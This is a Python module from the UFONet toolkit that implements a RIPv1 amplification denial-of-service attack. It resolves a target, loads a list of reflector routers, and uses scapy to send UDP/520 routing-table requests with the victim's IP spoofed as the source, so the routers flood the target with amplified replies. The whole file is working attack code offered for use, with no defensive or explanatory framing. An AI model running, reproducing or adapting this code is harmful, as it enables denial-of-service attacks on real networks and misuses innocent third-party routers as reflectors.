| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081 |
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-
- """
- This file is part of the UFONet project, https://ufonet.03c8.net
- Copyright (c) 2013/2026 | psy <epsylon@riseup.net>
- You should have received a copy of the GNU General Public License along
- with UFONet; if not, write to the Free Software Foundation, Inc., 51
- Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
- """
- import sys, random, socket
- from urllib.parse import urlparse
- try:
- from scapy.all import *
- except ImportError:
- from core._ensure import ensure
- if ensure('scapy.all', 'scapy') is None:
- print("\nError importing: scapy lib.\n")
- sys.exit(2)
- from scapy.all import *
- ripv1_file = "botnet/ripv1.txt"
- # UFONet RIPv1 Amplification (HALCYON) - amp factor ~131x (UDP/520, request whole routing table)
- def halcyonize(ip, rounds):
- n=0
- try:
- from core._botnet import load_botnet_file, warn_placeholders
- reflectors, _empty, _all_placeholder = load_botnet_file(ripv1_file)
- if _empty:
- print("[Error] [AI] [HALCYON] botnet/ripv1.txt is empty -> [Aborting!]")
- return
- if _all_placeholder:
- warn_placeholders("HALCYON", ripv1_file, kind="ripv1")
- return
- payload = (b'\x01\x01\x00\x00'
- b'\x00\x00\x00\x00'
- b'\x00\x00\x00\x00'
- b'\x00\x00\x00\x00'
- b'\x00\x00\x00\x00'
- b'\x00\x00\x00\x10')
- for x in range(int(rounds)):
- n += 1
- print("[Info] [AI] [HALCYON] Tracing 'route' ["+str(n)+"] through legacy routers! -> [SLOWING!]")
- for r in reflectors:
- try:
- sport = 520
- packet = IP(dst=r, src=ip) / UDP(sport=sport, dport=520) / Raw(load=payload)
- send(packet, verbose=0)
- print("[Info] [AI] [HALCYON] Traced 'route' ["+str(n)+"] IS INTERACTING WITH ["+r+"] -> [AMPLIFYING!]")
- except Exception:
- print("[Info] [AI] [HALCYON] Traced 'route' ["+str(n)+"] FAILED to reach ["+r+"] -> [PASSING!]")
- except:
- print("[Error] [AI] [HALCYON] Failing to engage... -> Is still target online? -> [Checking!]")
- class RIPV1(object):
- def attacking(self, target, rounds):
- print("[Info] [AI] RIPv1 Amplification (HALCYON) is ready to fire: [", rounds, "routes ]")
- if target.startswith('http://'):
- target = target.replace('http://','')
- elif target.startswith('https://'):
- target = target.replace('https://','')
- try:
- ip = socket.gethostbyname(target)
- except Exception:
- try:
- import dns.resolver
- r = dns.resolver.Resolver()
- from core._dns_pool import random_resolvers; r.nameservers = random_resolvers(2)
- url = urlparse(target)
- a = r.resolve(url.netloc, "A")
- for rd in a:
- ip = str(rd)
- except Exception:
- ip = target
- if ip == "127.0.0.1" or ip == "localhost":
- print("[Info] [AI] [HALCYON] Targeting 'localhost' -> [OK!]\n")
- return
- halcyonize(ip, rounds)
|